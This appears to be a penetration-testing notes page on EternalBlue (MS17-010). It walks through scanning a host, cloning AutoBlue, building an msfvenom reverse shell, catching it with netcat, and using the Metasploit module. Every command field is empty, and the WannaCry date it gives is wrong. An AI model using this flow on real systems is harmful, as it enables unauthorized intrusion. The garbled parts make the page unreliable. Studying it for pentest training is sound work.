🧨Exploiting Windows MS17-010 SMB Vulnerability (EternalBlue)
MS17-010 EternalBlue Exploit
EternalBlue (MS17-010/CVE-2017-0144) is the name given to a collection of Windows vulnerabilities and exploits that allow attackers to remotely execute arbitrary code and gain access to a Windows system and consequently the network that the target system is a part of.
The EternalBlue exploit was developed by the NSA (National Security Agency) to take advantage of the MS17-010 vulnerability and was leaked to the public by a hacker group called the Shadow Brokers in 2017.
The EternalBlue exploit takes advantage of a vulnerability in the Windows SMBv1 protocol that allows attackers to send specially crafted packets that consequently facilitate the execution of arbitrary commands.
The EternalBlue exploit was used in the WannaCry ransomware attack on June 27, 2017 to exploit other Windows systems across networks with the objective of spreading the ransomware to as many systems as possible.
This vulnerability affects multiple versions of Windows:
Windows Vista
Windows 7
Windows Server 2008
Windows 8.1
Windows Server 2012
Windows 10
Windows Server 2016
Microsoft released a patch for the vulnerability in March, 2017, however, many users and companies have still not yet patched their systems.
The EternalBlue exploit has a MSF auxiliary module that can be used to check if a target system if vulnerable to the exploit and also has an exploit module that can be used to exploit the vulnerability on unpatched systems.
The EternalBlue exploit module can be used to exploit vulnerable Windows systems and consequently provide us with a privileged meterpreter session on the target system.
In addition to MSF modules, we can also manually exploit the vulnerability by utilizing publicly available exploit code. </aside>
Attack Flow for the Windows MS17-010 SMB Vulnerability (EternalBlue)
1. Determine Vulnerability
Objective: Identify if the target system is vulnerable to Eternal Blue.
Command:
Description: Scan the target system to check for the MS17-010 vulnerability.
2. Clone the Exploit Repository
Objective: Download the necessary exploit code for MS17-010.
Command:
Description: Clone the AutoBlue-MS17-010 repository and navigate to its directory.
3. Install Prerequisites
Objective: Install the required dependencies for the exploit tool.
Command:
Description: Use the provided requirements.txt file to install necessary Python packages.
4. Generate the Shell Payload
Objective: Create a reverse shell payload for exploitation.
Command:
Description: Navigate to the shellcode folder, make shell_prep.sh executable, and run it to generate the shell payload using msfvenom.
Inside shell_prep.sh:
Set LHOST and LPORT values.
Generate a regular cmd shell.
Choose to create a stageless payload.
5. Set Up NetCat Listener
Objective: Prepare to receive the reverse shell connection.
Command:
Description: Start a NetCat listener on the specified port to capture the reverse shell.
6. Execute the Exploit
Objective: Run the Eternal Blue exploit code to establish a reverse shell.
Command:
Description: Navigate back to the main repository folder, make the exploit script executable, and run it to exploit the target and establish a reverse shell connection.
7. Alternative Method Using Metasploit
Objective: Use Metasploit to exploit the MS17-010 vulnerability.
Command:
Description: Use the ms17_010_eternalblue module in Metasploit to exploit the target system and establish a Meterpreter session.
Hacker's Mantra:If hackers, if anyone committing a criminal act, wants to reduce their risk, they obviously don’t involve anybody else. The greater the circle of people that know what you’re doing, the higher the risk. - Kevin Mitnick
Last updated